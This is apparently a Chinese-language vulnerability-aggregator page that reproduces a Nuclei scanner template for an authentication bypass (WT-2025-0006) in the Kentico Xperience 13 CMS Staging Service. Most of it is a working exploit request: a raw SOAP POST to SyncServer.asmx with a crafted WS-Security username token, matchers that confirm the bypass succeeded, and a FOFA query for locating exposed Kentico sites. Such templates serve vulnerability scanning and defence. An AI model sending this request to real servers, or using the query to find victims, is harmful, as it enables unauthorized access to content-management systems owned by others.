kentico-13-auth-bypass-wt-2025-0006: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0006)

日期: 2025-08-01 | 影响软件: Kentico Xperience 13 CMS | POC: 已公开

漏洞描述

A security issue exists in Kentico Xperience 13 (before Hotfix 173) when the Staging Service is enabled with username/password authentication. This vulnerability may allow unauthorized access or misuse of staging functionality.

PoC代码[已公开]

id: kentico-13-auth-bypass-wt-2025-0006

info:
  name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0006)
  author: DhiyaneshDK
  severity: unknown
  description: |
    A security issue exists in Kentico Xperience 13 (before Hotfix 173) when the Staging Service is enabled with username/password authentication. This vulnerability may allow unauthorized access or misuse of staging functionality.
  reference:
    - https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0006
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Kentico-CMS"
  tags: kentico,stag,auth-bypass,xperience13

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8
        SOAPAction: "http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData"

        <?xml version="1.0" encoding="utf-8"?>
            <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
                <soap:Header>
                    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
                <wsse:UsernameToken>
                    <wsse:Username>y3t4kallxq</wsse:Username>
                    <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">6dfzCOJsdj5Aw+1rGzwoHadPFTQ=</wsse:Password>
                    <wsse:Nonce>4JX/SboVYnxbh8hm3ySQdIUJtFK9cqUh</wsse:Nonce>
                    <wsu:Created>2025-03-10T20:11:07Z</wsu:Created>
                        </wsse:UsernameToken>
                    </wsse:Security>
                </soap:Header>
                <soap:Body>
                    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
                        <stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
                    </ProcessSynchronizationTaskData>
                </soap:Body>
            </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{rand}}"
          - "<wsa:Action>"
        condition: and

      - type: word
        part: body
        words:
          - "Site not running"
          - "SyncServer.ErrorLicense"
          - "SyncServer.ErrorServiceNotEnabled"
          - "Staging service is not enabled on this server"
          - "Staging does not work with blank password"
          - "Missing X509 certificate token"
          - "The security token could not be authenticated or authorized"
        condition: or
        negative: true

      - type: word
        part: content_type
        words:
          - "text/xml"
# digest: 490a00463044022016bce7b8e56549f003dc0f8a4f7529af88bbfe41a6d05e58e7cbe39982cdd655022066b3c96ebb1794ebe9cc6c7078608bfe90ec1319e46bf2b94b4c5f42db74d4a6:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/misconfiguration/kentico-13-auth-bypass-wt-2025-0006.yaml

相关漏洞推荐